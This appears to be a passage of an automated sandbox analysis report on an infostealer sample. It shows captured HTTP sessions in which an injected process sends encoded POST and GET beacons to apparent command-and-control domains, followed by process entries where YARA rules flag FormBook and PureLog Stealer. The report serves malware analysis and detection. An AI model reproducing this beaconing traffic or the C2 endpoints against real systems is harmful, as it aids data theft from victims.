                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAXpYLOYWnpWeejz%2BJ%2BHL7N7ePGHz1fPfgWPiCFLoisn9QDeRE45bEkzK%2BRsVpVHLLmGXixjdNf8G0kqmWcKH7gFjhH392LHLKAySBRssw27rWQiKCPNSiHsHbC8bwiQ97RMqKjViKel"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399286feede99-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 09:39:47.397242069 CET | 423 | IN | gzip-compressed response body (continued)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 50059 | 104.21.88.139 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:39:49.414685965 CET | 10822 | OUT | POST /rm8a/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.incgruporxat.click
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.incgruporxat.click
                                                                                                                                      Referer: http://www.incgruporxat.click/rm8a/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:39:50.019889116 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:49 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABNAt83oNbX1%2BxC9PZcogsWDBhlWCz32Ai61%2Fa2PGJjln2NRnnqP6zy7H2e%2BoMmV6RjaL7119DzTJo16HFtYrGck5qpFvhsS%2B9XdImzxz2xbNFUPC1yfL8qRb5y5DM5RK%2BVBGktkBs8k"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399384c6d8c41-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10822&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Jan 11, 2025 09:39:50.019906044 CET | 430 | IN | gzip-compressed response body (continued)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.4 | 50060 | 104.21.88.139 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:39:51.953730106 CET | 445 | OUT | GET /rm8a/?sTS=D6HNS+3OA9WxuB6ixfDf8ScOMqf60XWg1eRGn1U3pQm4dbrOXbziEv17YWBDjG9YL3PgZ6NF0eFX/SB1L/rjn2byVNbXQbqI29dbukDAFIdClQ55cQRWn7Y=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.incgruporxat.click
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:39:52.587037086 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:39:52 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                      pragma: no-cache
                                                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OuMRHg8zPOKYYiFqQ7hQbJ5gCnjfyjrz9kWB21BvEQSp5nVxuDMCsg3t0yyVamWJIJSfgx35q2kH5ofNSNZguVMQtwoBiwl45HoeLMMovV096qWKsh7z7Ss4ZQVWiee30BgfgLY991jC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399485b0cde93-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=445&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica,
Jan 11, 2025 09:39:52.587058067 CET | 916 | IN |
Data Ascii: sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-si


Session ID | Source IP | Source Port | Destination IP | Destination Port
53 | 192.168.2.4 | 50061 | 15.197.142.173 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:40:01.112095118 CET | 444 | OUT | GET /zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.dojodigitize.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:40:01.576699972 CET  133  IN  HTTP/1.1 404 Not Found
                                                                                                                                      Server: awselb/2.0
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:01 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close
                                                                                                                                      WAFRule: 5


                                                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                      54  192.168.2.4  50062  104.21.80.1  80
                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:40:06.623487949 CET  702  OUT  POST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=moIYvYq7EEvVURa8F3ZfZJKLTVI07rAiWNU3QSCaovL4jSGNx4aRf8H+dDunaT/dgbV4ap4ug/1Sl/N+QtyXStdz2n8tz21CZ+fwkPQ+tHQcGuDBAk9VJ9FOJf9bjLkJAOAzeHs5FFh9WBvBxU56sVwvMJOe0QKwxFowCPXuPxa/J6RB/Yaq25YSLTBeH0vZjw==
                                                                                                                                      Jan 11, 2025 09:40:07.209880114 CET  836  IN  HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:07 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ti8Udf75Eo4n743kGB%2F9QPbb758G2bmcA1Bg6XRDpwzJlTE7VD4PVTyLdQ9dDyyciKIMAgK62j%2Fuf%2BDz1aDUv6IW%2Bexwuu5sRMbBygvlnA7x%2BQTGPrGGEXh%2BoHl8Qi71aRq6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399a3cbaf43ee-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Jan 11, 2025 09:40:07.210459948 CET  225  IN


                                                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                      55  192.168.2.4  50063  104.21.80.1  80
                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:40:09.163280964 CET  722  OUT  POST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=moIYvYq7EEvVSxq8EUxfRJKMKlI0xLAmWNY3QTGKoaT4ky2N+cORe8H+XjuiQz/GgbZwat4ug/hSl9V+QauYT9dxwn8v321CZ+fwkPEAtHIcHezBAGVUPNFNOf9bnLkFAOAdeGxkFGV9WAfByF55iVwtP5P7zQPG8mE9A/7iFRLcFccbup79k58hWUIqK3SQ4w/kRKXgGSAYjiNVjEL/3WU=
                                                                                                                                      Jan 11, 2025 09:40:09.781738997 CET  1043  IN  HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:09 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wKd7SpC5Ihip1i8tpWZqhMXbcZ2abVLvkidWSpdL1Om5RwtkW%2BmTg%2Fb4p62K1hKRW4gnvJwmzIwjiDE6FGv1cwEcxsLxfJoDb5zCQECZzWaSyddKkL2x3LwCrHrfm1QzQYd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399b3b8508c0f-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Jan 11, 2025 09:40:09.782279015 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                      56  192.168.2.4  50064  104.21.80.1  80
                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:40:11.710021019 CET  10804  OUT  POST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:40:12.324444056 CET  1055  IN  HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:12 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbpIwYfvCWaqPyEx4jFH54W8ykyO%2FKSHMVTsWG1pMWooMCEKVIPX6bPIYw%2FWwteRMGN%2FKg6gQhaZZ38Uu9p68cA5uanxe%2BDWi4NsMexLRrlA9tf3cCEelpu8oZiFuUYg7wys"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399c3aa008c0f-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10804&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                      57  192.168.2.4  50065  104.21.80.1  80
                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:40:14.250885963 CET  439  OUT  GET /vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:40:14.833726883 CET  1056  IN  HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:40:14 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fS7W5D9RuPmSFNyO6FHSzRPFDM5X5y0K5uMzRrpGxjwA3gb82qWOuP0M6SmBXAvLGYobPvK5TuG8BVTLpan7SQqTD7xBDwmP7DiPRIq5yIINQFJFPUYgldg%2BUrKxN5O1mLPw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900399d39bf78c0f-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1881&rtt_var=940&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=439&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0


                                                                                                                                      Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                      58  192.168.2.4  50066  13.248.169.48  80
                                                                                                                                      Timestamp  Bytes transferred  Direction  Data
                                                                                                                                      Jan 11, 2025 09:40:19.870510101 CET  699  OUT  POST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/tzTZMy3Yd0Zb2dZ067H8VDbvV3SGZ8NTkxI+AJwcDjG+buD8QMOjICvJDV3VFgubMLKcrvgtt3jhP5V3g9qNrhJYXQrOv41oUazAO+M41JRKs9ozDQLwvFXq3MTv/VriSAzqXxnisMEXzMp86iacvv0apyXmxvHixOmfk+/GpDEHFA7JYYD+uw==
Jan 11, 2025 09:40:20.327718973 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
59 | 192.168.2.4 | 50067 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:40:22.414813995 CET | 719 | OUT | POST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZupTkR4+BMccAjG+TOD5dsOoICjBDXTVFjSbMJicqYUuuHjjAZV19tqNrhJYXQOpv4doUvjAOc03rZRJ8NozOwL0vFXU3JyK/XjiSFXqUjP9mMER3MoVqXzS2txqhh3687bv0IrF1PeR7Dg0YHy9Vb+3148HSvdlx/bGB7HfuYWcT7I=
Jan 11, 2025 09:40:22.859435081 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
60 | 192.168.2.4 | 50068 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:40:24.961946011 CET | 10801 | OUT | POST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)


Session ID | Source IP | Source Port | Destination IP | Destination Port
61 | 192.168.2.4 | 50069 | 13.248.169.48 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:40:27.503035069 CET | 438 | OUT | GET /ve8l/?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8= HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:40:27.958606005 CET | 377 | IN | HTTP/1.1 200 OK
                                                                                                                                      content-type: text/html
                                                                                                                                      date: Sat, 11 Jan 2025 08:40:27 GMT
                                                                                                                                      content-length: 256
                                                                                                                                      connection: close
                                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fd=Cr_TAhTpvZaLf&sTS=2CD4NCzEaM98tRHxByL6CBkb+r1SrLrNZhOfTEabPOsm5z4GKvQfPi2Ic9iPSKmuH0LkAH7bJGGmIcrctbsX23D3J9NSlYassghIEyGyoqU/M/j1A+InoJ8="}</script></head></html>



                                                                                                                                      Target ID:0
                                                                                                                                      Start time:03:35:50
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Users\user\Desktop\QsBdpe1gK5.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\QsBdpe1gK5.exe"
                                                                                                                                      Imagebase:0xe00000
                                                                                                                                      File size:798'720 bytes
                                                                                                                                      MD5 hash:4BC2F58C4AC26D5D012F166D263D3B72
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1698119849.00000000041B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1701516930.0000000007C40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1697576288.00000000031FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:2
                                                                                                                                      Start time:03:35:52
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Users\user\Desktop\QsBdpe1gK5.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Users\user\Desktop\QsBdpe1gK5.exe"
                                                                                                                                      Imagebase:0x630000
                                                                                                                                      File size:798'720 bytes
                                                                                                                                      MD5 hash:4BC2F58C4AC26D5D012F166D263D3B72
                                                                                                                                      Has elevated privileges:true
                                                                                                                                      Has administrator privileges:true
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1841761840.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1849388475.0000000001460000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1850179249.0000000001570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Target ID:3
                                                                                                                                      Start time:03:36:00
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe"
                                                                                                                                      Imagebase:0xb80000
                                                                                                                                      File size:140'800 bytes
                                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4126980788.0000000002B90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:high
                                                                                                                                      Has exited:false

                                                                                                                                      Target ID:4
                                                                                                                                      Start time:03:36:01
                                                                                                                                      Start date:11/01/2025
                                                                                                                                      Path:C:\Windows\SysWOW64\find.exe
                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                      Commandline:"C:\Windows\SysWOW64\find.exe"
                                                                                                                                      Imagebase:0xb10000
                                                                                                                                      File size:14'848 bytes
                                                                                                                                      MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4126273747.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4126207300.0000000002B60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
